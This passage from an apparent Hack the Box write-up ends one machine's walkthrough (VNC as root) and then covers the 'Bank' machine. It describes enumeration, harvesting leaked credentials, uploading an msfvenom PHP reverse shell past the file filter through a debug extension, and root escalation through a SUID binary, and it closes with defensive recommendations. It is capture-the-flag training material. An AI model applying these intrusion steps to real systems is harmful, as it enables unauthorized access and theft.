Normally, we would need to know the password for a VNC session, but TightVNC actually has an option to provide a file as the password for a session. The secret file found earlier sounds more relevant now.

Using secret file as password for tightvnc

Running TightVNC, with the secret file as the password, we’re able to successfully connect to the VNC session and it looks like we’re now running as root. Huzzah!

VNC session to the machine as root

That’s all for this one, so, until next time.

Recommendations

It’s hard to suggest realistic recommendations for some of these machines that are obviously set up to be so unrealistic. We’ll give it a shot though.

  • Leaving a web application that has access to read local files on the web server is obviously a bad idea. Ideally this should only be used in a development environment and removed for production. However, if for some reason this functionality is needed in the final product, it should require authentication before users are able to access it.
  • Passwords should not be re-used. If sensitive files are stored on a machine other users might be able to access, the password to access them should be different than the user’s regular password.

Hack the Box – #3 – Bank

The next machine from Hack the Box is Bank, an Ubuntu web server hosting a website for a…wait for it… a bank.

Starting with the regular nmap scan, we see ports 22, 53, and 80 open, with the default Apache home page showing on the web site.

nmap -sC -sV 10.10.10.29

The first thing I checked was the web page and ran gobuster to try and find any useful sub-directories. However, there didn’t seem to be anything to work with. On a hunch (based on previous HTB machines), I added an entry to my host file to associate the machine’s IP with ‘bank.htb’. Once this was done, visiting bank.htb re-directs to the login page below for a fake bank.

bank.htb landing page

I tested a few common default credentials, but, not surprisingly, they didn’t work. I re-ran gobuster on http://bank.htb instead of the IP used earlier and found several new directories. Three just held the files used to load the website and nothing sensitive, one I didn’t have access to view, but /balance-transfer looked interesting.

gobuster results for http://bank.htb

Visiting this page gives a list of what appear to be individual bank transactions with encrypted customer information.

List of transactions
Encrypted information in each transaction log

There were a large number of transactions listed on this page and all of them, except one, had a size listed between 580 and 585. The one below stood out for being less than half the size of the others.

Opening this transaction shows clear-text credentials for the customer Christos Christopoulos on a transaction that appears to have failed to be encrypted.

Using these credentials on the bank login page found earlier allows us access to the customer’s dashboard, showing various pieces of account information.

The dashboard also has an option for “Support”, which leads to what seems to be a way of submitting a ticket and allows for a file to be uploaded.

My first reaction was to create a malicious php file with msfvenom and upload it through this page, hoping we can run it somehow on the web server. Below is the command used to generate the php code that was then copied into a file called “shell.php”.

msfvenom php code generated to upload to web server

Unfortunately, the site gives an error that only image files are allowed to be uploaded when trying to upload shell.php. Modifying the file name to an extension used for images uploads successfully, but isn’t very useful if we can’t execute the code. After a few other fruitless attempts, I looked at the source code for the page and found a way around their upload limitation using debug functionality that was not removed.

Source code for support.php revealing an extension used for debugging

I re-named my php file to shell.htb and tried to upload it one more time. This time it worked successfully and my information/file was listed under the “My Tickets” section on the left side of the page.

File re-named to shell.htb
shell.htb file successfully uploaded

Before clicking the “Click Here” option for my attachment, I started a listener in metasploit to catch the connection, assuming it was going to work. Luckily, the php code executed when the attachment was viewed and it connected back to my listener, giving me a meterpreter shell on the machine as the www-data user.

Now that we’re on the machine, we need to find how to escalate privileges. Looking for SUID files is usually my first step, so I dropped into a shell from meterpreter and used python to upgrade the functionality.

From my new shell, I ran a search for any files with the SUID bit set. One in particular stood out, a file called “emergency” in a non-standard directory.

Using cat on the file doesn’t give any useful information as it appears to be a compiled binary, but the binary is owned by root and can be executed by the www-data user. Running the file doesn’t do anything immediately noticeable, other than replacing our standard prompt with a #. Testing the prompt reveals it has created a new shell running with an euid of root.

And that’s all there is for Bank. I enjoyed this one, mainly because the last few I’ve done have ended up being pretty basic once you figure out what kind of exploit is needed.

Additional Notes

As this server was also running a DNS service, some additional enumeration could be done around this. I used dig to attempt a zone transfer on the server and found the sub-domains below, but they didn’t really help me get anywhere, though it’s very possible (and even likely) that I missed something.

Recommendations

  1. Restrict access to web directories that do not need to be publicly visible.
  2. Enable alerting of some type for when a transaction log fails to be encrypted.
  3. Ensure any additional functionality used for debugging is removed before code is put into production.
  4. Remove the use of files on the server that allow a regular user access to a shell with root privileges. If additional privileges are needed, an account with appropriate privileges should be used.